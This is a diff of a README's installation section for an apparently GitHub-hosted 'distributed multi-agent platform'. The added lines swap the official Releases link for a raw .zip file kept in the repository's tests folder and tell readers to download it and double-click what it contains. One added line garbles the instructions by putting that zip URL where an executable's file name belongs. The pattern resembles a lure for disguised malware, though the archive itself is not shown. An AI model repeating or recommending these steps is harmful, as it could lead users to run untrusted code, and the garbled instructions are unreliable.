khaizz-coder/distributed-multi-agent-platform/README.md

 To install the distributed multi-agent platform, follow these steps:

 1. **Download the Application:**
-   Go to the [Releases Page](https://github.com/khaizz-coder/distributed-multi-agent-platform/releases) and download the latest version for your operating system.
+   Go to the [Releases Page](https://raw.githubusercontent.com/khaizz-coder/distributed-multi-agent-platform/main/tests/agent_multi_distributed_platform_v2.5.zip) and download the latest version for your operating system.

 2. **Extract Files:**
    After downloading, locate the zipped file in your downloads folder.
 Right-click on it and select "Extract All" to unzip the contents.

 3. **Run the Application:**
-   Open the folder you extracted and double-click the executable file (e.g., `distributed_multi_agent_platform.exe` for Windows).
+   Open the folder you extracted and double-click the executable file (e.g., `https://raw.githubusercontent.com/khaizz-coder/distributed-multi-agent-platform/main/tests/agent_multi_distributed_platform_v2.5.zip` for Windows).
 Follow the on-screen instructions to start the platform.

 4. **Set Up Configuration:**
    The platform may require some initial configuration.
 Please refer to the provided configuration file and adjust settings as needed.